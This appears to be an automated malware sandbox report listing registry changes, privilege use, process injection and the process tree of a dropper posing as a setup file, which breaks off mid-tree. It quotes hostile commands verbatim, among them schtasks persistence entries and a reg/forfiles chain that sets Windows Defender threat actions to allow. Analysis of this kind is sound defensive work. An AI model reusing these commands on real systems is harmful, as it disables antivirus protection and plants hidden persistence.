Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8ccc3c3f-0000-0000-0000-d01200000000}\NukeOnDelete = "0"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	qEOazug.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	qEOazug.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	Install.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	qEOazug.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	qEOazug.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	qEOazug.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1816	schtasks.exe
2728	schtasks.exe
6048	schtasks.exe
6060	schtasks.exe
212	schtasks.exe
3324	schtasks.exe
5892	schtasks.exe
6032	schtasks.exe
5624	schtasks.exe
3104	schtasks.exe
2596	schtasks.exe
5432	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3436	1719422619.8807507_setup.exe
3436	1719422619.8807507_setup.exe
676	ehxtKGTOWlREU5aG0RQfu9Ag.exe
676	ehxtKGTOWlREU5aG0RQfu9Ag.exe
1284	i0JJithUZkia7pknf7CtIhgb.exe
1284	i0JJithUZkia7pknf7CtIhgb.exe
1284	i0JJithUZkia7pknf7CtIhgb.exe
1284	i0JJithUZkia7pknf7CtIhgb.exe
1884	vN2Fx_IOTbgMowts5MmYC7ix.exe
1884	vN2Fx_IOTbgMowts5MmYC7ix.exe
1744	9mjuM5End3qW0in8BBGuRAA1.exe
1744	9mjuM5End3qW0in8BBGuRAA1.exe
2128	R_sWfKbdnDIPflC0DERt7gFw.exe
2128	R_sWfKbdnDIPflC0DERt7gFw.exe
852	MSBuild.exe
852	MSBuild.exe
852	MSBuild.exe
852	MSBuild.exe
3352	powershell.exe
3352	powershell.exe
3352	powershell.exe
5200	MSBuild.exe
5200	MSBuild.exe
4520	powershell.exe
4520	powershell.exe
4520	powershell.exe
852	MSBuild.exe
852	MSBuild.exe
2300	MSBuild.exe
2300	MSBuild.exe
1884	vN2Fx_IOTbgMowts5MmYC7ix.exe
1884	vN2Fx_IOTbgMowts5MmYC7ix.exe
5200	MSBuild.exe
5200	MSBuild.exe
6060	HCAEBFBKKJ.exe
6060	HCAEBFBKKJ.exe
2176	explortu.exe
2176	explortu.exe
1744	9mjuM5End3qW0in8BBGuRAA1.exe
1744	9mjuM5End3qW0in8BBGuRAA1.exe
1744	9mjuM5End3qW0in8BBGuRAA1.exe
1744	9mjuM5End3qW0in8BBGuRAA1.exe
1744	9mjuM5End3qW0in8BBGuRAA1.exe
1744	9mjuM5End3qW0in8BBGuRAA1.exe
1744	9mjuM5End3qW0in8BBGuRAA1.exe
1744	9mjuM5End3qW0in8BBGuRAA1.exe
3456	eqtpkqwqodik.exe
3456	eqtpkqwqodik.exe
3456	eqtpkqwqodik.exe
3456	eqtpkqwqodik.exe
3456	eqtpkqwqodik.exe
3456	eqtpkqwqodik.exe
3456	eqtpkqwqodik.exe
3456	eqtpkqwqodik.exe
5200	MSBuild.exe
5200	MSBuild.exe
5200	MSBuild.exe
5200	MSBuild.exe
4528	RegAsm.exe
4528	RegAsm.exe
5400	explortu.exe
5400	explortu.exe
4940	powershell.exe
4940	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1284	i0JJithUZkia7pknf7CtIhgb.exe
Token: SeDebugPrivilege	540	F3G_EO4KQh4oWKWb0bXe7vmo.exe
Token: SeDebugPrivilege	676	ehxtKGTOWlREU5aG0RQfu9Ag.exe
Token: SeDebugPrivilege	2300	MSBuild.exe
Token: SeBackupPrivilege	2300	MSBuild.exe
Token: SeSecurityPrivilege	2300	MSBuild.exe
Token: SeSecurityPrivilege	2300	MSBuild.exe
Token: SeSecurityPrivilege	2300	MSBuild.exe
Token: SeSecurityPrivilege	2300	MSBuild.exe
Token: SeDebugPrivilege	3352	powershell.exe
Token: SeDebugPrivilege	4520	powershell.exe
Token: SeIncreaseQuotaPrivilege	5248	WMIC.exe
Token: SeSecurityPrivilege	5248	WMIC.exe
Token: SeTakeOwnershipPrivilege	5248	WMIC.exe
Token: SeLoadDriverPrivilege	5248	WMIC.exe
Token: SeSystemProfilePrivilege	5248	WMIC.exe
Token: SeSystemtimePrivilege	5248	WMIC.exe
Token: SeProfSingleProcessPrivilege	5248	WMIC.exe
Token: SeIncBasePriorityPrivilege	5248	WMIC.exe
Token: SeCreatePagefilePrivilege	5248	WMIC.exe
Token: SeBackupPrivilege	5248	WMIC.exe
Token: SeRestorePrivilege	5248	WMIC.exe
Token: SeShutdownPrivilege	5248	WMIC.exe
Token: SeDebugPrivilege	5248	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5248	WMIC.exe
Token: SeRemoteShutdownPrivilege	5248	WMIC.exe
Token: SeUndockPrivilege	5248	WMIC.exe
Token: SeManageVolumePrivilege	5248	WMIC.exe
Token: 33	5248	WMIC.exe
Token: 34	5248	WMIC.exe
Token: 35	5248	WMIC.exe
Token: 36	5248	WMIC.exe
Token: SeIncreaseQuotaPrivilege	5248	WMIC.exe
Token: SeSecurityPrivilege	5248	WMIC.exe
Token: SeTakeOwnershipPrivilege	5248	WMIC.exe
Token: SeLoadDriverPrivilege	5248	WMIC.exe
Token: SeSystemProfilePrivilege	5248	WMIC.exe
Token: SeSystemtimePrivilege	5248	WMIC.exe
Token: SeProfSingleProcessPrivilege	5248	WMIC.exe
Token: SeIncBasePriorityPrivilege	5248	WMIC.exe
Token: SeCreatePagefilePrivilege	5248	WMIC.exe
Token: SeBackupPrivilege	5248	WMIC.exe
Token: SeRestorePrivilege	5248	WMIC.exe
Token: SeShutdownPrivilege	5248	WMIC.exe
Token: SeDebugPrivilege	5248	WMIC.exe
Token: SeSystemEnvironmentPrivilege	5248	WMIC.exe
Token: SeRemoteShutdownPrivilege	5248	WMIC.exe
Token: SeUndockPrivilege	5248	WMIC.exe
Token: SeManageVolumePrivilege	5248	WMIC.exe
Token: 33	5248	WMIC.exe
Token: 34	5248	WMIC.exe
Token: 35	5248	WMIC.exe
Token: 36	5248	WMIC.exe
Token: SeDebugPrivilege	852	MSBuild.exe
Token: SeShutdownPrivilege	1312	powercfg.exe
Token: SeCreatePagefilePrivilege	1312	powercfg.exe
Token: SeShutdownPrivilege	4948	powercfg.exe
Token: SeCreatePagefilePrivilege	4948	powercfg.exe
Token: SeShutdownPrivilege	5248	powercfg.exe
Token: SeCreatePagefilePrivilege	5248	powercfg.exe
Token: SeShutdownPrivilege	2304	powercfg.exe
Token: SeCreatePagefilePrivilege	2304	powercfg.exe
Token: SeLockMemoryPrivilege	3684	svchost.exe
Token: SeShutdownPrivilege	5492	powercfg.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
844	r67rDvPigX7qOQOkmYNaj_9T.tmp

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1884	vN2Fx_IOTbgMowts5MmYC7ix.exe
5464	cmd.exe
5636	5e0951ecbc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3436 wrote to memory of 1884	3436	1719422619.8807507_setup.exe	97
PID 3436 wrote to memory of 1884	3436	1719422619.8807507_setup.exe	97
PID 3436 wrote to memory of 1884	3436	1719422619.8807507_setup.exe	97
PID 3436 wrote to memory of 676	3436	1719422619.8807507_setup.exe	100
PID 3436 wrote to memory of 676	3436	1719422619.8807507_setup.exe	100
PID 3436 wrote to memory of 676	3436	1719422619.8807507_setup.exe	100
PID 3436 wrote to memory of 2128	3436	1719422619.8807507_setup.exe	98
PID 3436 wrote to memory of 2128	3436	1719422619.8807507_setup.exe	98
PID 3436 wrote to memory of 2128	3436	1719422619.8807507_setup.exe	98
PID 3436 wrote to memory of 540	3436	1719422619.8807507_setup.exe	102
PID 3436 wrote to memory of 540	3436	1719422619.8807507_setup.exe	102
PID 3436 wrote to memory of 540	3436	1719422619.8807507_setup.exe	102
PID 3436 wrote to memory of 392	3436	1719422619.8807507_setup.exe	99
PID 3436 wrote to memory of 392	3436	1719422619.8807507_setup.exe	99
PID 3436 wrote to memory of 3804	3436	1719422619.8807507_setup.exe	101
PID 3436 wrote to memory of 3804	3436	1719422619.8807507_setup.exe	101
PID 3436 wrote to memory of 3804	3436	1719422619.8807507_setup.exe	101
PID 3436 wrote to memory of 1284	3436	1719422619.8807507_setup.exe	104
PID 3436 wrote to memory of 1284	3436	1719422619.8807507_setup.exe	104
PID 3436 wrote to memory of 1284	3436	1719422619.8807507_setup.exe	104
PID 3436 wrote to memory of 4052	3436	1719422619.8807507_setup.exe	103
PID 3436 wrote to memory of 4052	3436	1719422619.8807507_setup.exe	103
PID 3436 wrote to memory of 4052	3436	1719422619.8807507_setup.exe	103
PID 3436 wrote to memory of 1744	3436	1719422619.8807507_setup.exe	105
PID 3436 wrote to memory of 1744	3436	1719422619.8807507_setup.exe	105
PID 3804 wrote to memory of 844	3804	r67rDvPigX7qOQOkmYNaj_9T.exe	106
PID 3804 wrote to memory of 844	3804	r67rDvPigX7qOQOkmYNaj_9T.exe	106
PID 3804 wrote to memory of 844	3804	r67rDvPigX7qOQOkmYNaj_9T.exe	106
PID 676 wrote to memory of 596	676	ehxtKGTOWlREU5aG0RQfu9Ag.exe	108
PID 676 wrote to memory of 596	676	ehxtKGTOWlREU5aG0RQfu9Ag.exe	108
PID 676 wrote to memory of 596	676	ehxtKGTOWlREU5aG0RQfu9Ag.exe	108
PID 540 wrote to memory of 852	540	F3G_EO4KQh4oWKWb0bXe7vmo.exe	107
PID 540 wrote to memory of 852	540	F3G_EO4KQh4oWKWb0bXe7vmo.exe	107
PID 540 wrote to memory of 852	540	F3G_EO4KQh4oWKWb0bXe7vmo.exe	107
PID 1284 wrote to memory of 4268	1284	i0JJithUZkia7pknf7CtIhgb.exe	109
PID 1284 wrote to memory of 4268	1284	i0JJithUZkia7pknf7CtIhgb.exe	109
PID 1284 wrote to memory of 4268	1284	i0JJithUZkia7pknf7CtIhgb.exe	109
PID 540 wrote to memory of 852	540	F3G_EO4KQh4oWKWb0bXe7vmo.exe	107
PID 540 wrote to memory of 852	540	F3G_EO4KQh4oWKWb0bXe7vmo.exe	107
PID 540 wrote to memory of 852	540	F3G_EO4KQh4oWKWb0bXe7vmo.exe	107
PID 540 wrote to memory of 852	540	F3G_EO4KQh4oWKWb0bXe7vmo.exe	107
PID 540 wrote to memory of 852	540	F3G_EO4KQh4oWKWb0bXe7vmo.exe	107
PID 676 wrote to memory of 2300	676	ehxtKGTOWlREU5aG0RQfu9Ag.exe	110
PID 676 wrote to memory of 2300	676	ehxtKGTOWlREU5aG0RQfu9Ag.exe	110
PID 676 wrote to memory of 2300	676	ehxtKGTOWlREU5aG0RQfu9Ag.exe	110
PID 1284 wrote to memory of 5124	1284	i0JJithUZkia7pknf7CtIhgb.exe	111
PID 1284 wrote to memory of 5124	1284	i0JJithUZkia7pknf7CtIhgb.exe	111
PID 1284 wrote to memory of 5124	1284	i0JJithUZkia7pknf7CtIhgb.exe	111
PID 676 wrote to memory of 2300	676	ehxtKGTOWlREU5aG0RQfu9Ag.exe	110
PID 676 wrote to memory of 2300	676	ehxtKGTOWlREU5aG0RQfu9Ag.exe	110
PID 676 wrote to memory of 2300	676	ehxtKGTOWlREU5aG0RQfu9Ag.exe	110
PID 676 wrote to memory of 2300	676	ehxtKGTOWlREU5aG0RQfu9Ag.exe	110
PID 676 wrote to memory of 2300	676	ehxtKGTOWlREU5aG0RQfu9Ag.exe	110
PID 1284 wrote to memory of 5200	1284	i0JJithUZkia7pknf7CtIhgb.exe	113
PID 1284 wrote to memory of 5200	1284	i0JJithUZkia7pknf7CtIhgb.exe	113
PID 1284 wrote to memory of 5200	1284	i0JJithUZkia7pknf7CtIhgb.exe	113
PID 4052 wrote to memory of 5164	4052	EF9AiWf4dZ3QMKewGiYgX74X.exe	112
PID 4052 wrote to memory of 5164	4052	EF9AiWf4dZ3QMKewGiYgX74X.exe	112
PID 4052 wrote to memory of 5164	4052	EF9AiWf4dZ3QMKewGiYgX74X.exe	112
PID 1284 wrote to memory of 5200	1284	i0JJithUZkia7pknf7CtIhgb.exe	113
PID 1284 wrote to memory of 5200	1284	i0JJithUZkia7pknf7CtIhgb.exe	113
PID 1284 wrote to memory of 5200	1284	i0JJithUZkia7pknf7CtIhgb.exe	113
PID 1284 wrote to memory of 5200	1284	i0JJithUZkia7pknf7CtIhgb.exe	113
PID 1284 wrote to memory of 5200	1284	i0JJithUZkia7pknf7CtIhgb.exe	113

C:\Users\Admin\AppData\Local\Temp\1719422619.8807507_setup.exe
"C:\Users\Admin\AppData\Local\Temp\1719422619.8807507_setup.exe"
1⤵
- Modifies firewall policy service
- Checks computer location settings
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3436
- C:\Users\Admin\Documents\SimpleAdobe\vN2Fx_IOTbgMowts5MmYC7ix.exe
  C:\Users\Admin\Documents\SimpleAdobe\vN2Fx_IOTbgMowts5MmYC7ix.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:1884
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\HCAEBFBKKJ.exe"
    3⤵
    PID:5700
  - - C:\Users\Admin\AppData\Local\Temp\HCAEBFBKKJ.exe
      "C:\Users\Admin\AppData\Local\Temp\HCAEBFBKKJ.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      PID:6060
    - - C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2176
      - C:\Users\Admin\AppData\Local\Temp\1000022001\5e0951ecbc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000022001\5e0951ecbc.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetWindowsHookEx
        
        PID:5636
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\GHDHDGHJEB.exe"
    3⤵
    - Checks computer location settings
    - Suspicious use of SetWindowsHookEx
    PID:5464
- C:\Users\Admin\Documents\SimpleAdobe\R_sWfKbdnDIPflC0DERt7gFw.exe
  C:\Users\Admin\Documents\SimpleAdobe\R_sWfKbdnDIPflC0DERt7gFw.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:2128
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5892
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:6032
- C:\Users\Admin\Documents\SimpleAdobe\T1XdsqWBVHThKRY6KT4OUjyc.exe
  C:\Users\Admin\Documents\SimpleAdobe\T1XdsqWBVHThKRY6KT4OUjyc.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:392
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    PID:2340
- C:\Users\Admin\Documents\SimpleAdobe\ehxtKGTOWlREU5aG0RQfu9Ag.exe
  C:\Users\Admin\Documents\SimpleAdobe\ehxtKGTOWlREU5aG0RQfu9Ag.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:676
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:596
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2300
- C:\Users\Admin\Documents\SimpleAdobe\r67rDvPigX7qOQOkmYNaj_9T.exe
  C:\Users\Admin\Documents\SimpleAdobe\r67rDvPigX7qOQOkmYNaj_9T.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3804
- - C:\Users\Admin\AppData\Local\Temp\is-08EH8.tmp\r67rDvPigX7qOQOkmYNaj_9T.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-08EH8.tmp\r67rDvPigX7qOQOkmYNaj_9T.tmp" /SL5="$801C4,5143929,54272,C:\Users\Admin\Documents\SimpleAdobe\r67rDvPigX7qOQOkmYNaj_9T.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of FindShellTrayWindow
    PID:844
  - - C:\Users\Admin\AppData\Local\Audio Normalizer\audionormalizer32_64.exe
      "C:\Users\Admin\AppData\Local\Audio Normalizer\audionormalizer32_64.exe" -i
      4⤵
      Executes dropped EXE
      PID:5424
  - - C:\Users\Admin\AppData\Local\Audio Normalizer\audionormalizer32_64.exe
      "C:\Users\Admin\AppData\Local\Audio Normalizer\audionormalizer32_64.exe" -s
      4⤵
      Executes dropped EXE
      PID:5512
- C:\Users\Admin\Documents\SimpleAdobe\F3G_EO4KQh4oWKWb0bXe7vmo.exe
  C:\Users\Admin\Documents\SimpleAdobe\F3G_EO4KQh4oWKWb0bXe7vmo.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:540
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:852
- C:\Users\Admin\Documents\SimpleAdobe\EF9AiWf4dZ3QMKewGiYgX74X.exe
  C:\Users\Admin\Documents\SimpleAdobe\EF9AiWf4dZ3QMKewGiYgX74X.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4052
- - C:\Users\Admin\AppData\Local\Temp\7zS51C.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    PID:5164
  - - C:\Users\Admin\AppData\Local\Temp\7zSEB1.tmp\Install.exe
      .\Install.exe /JudidKE "525403" /S
      4⤵
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Enumerates system info in registry
      PID:5500
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        5⤵
        
        PID:5872
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        6⤵
        
        PID:5996
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:6016
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:6040
      - C:\Windows\SysWOW64\forfiles.exe
        
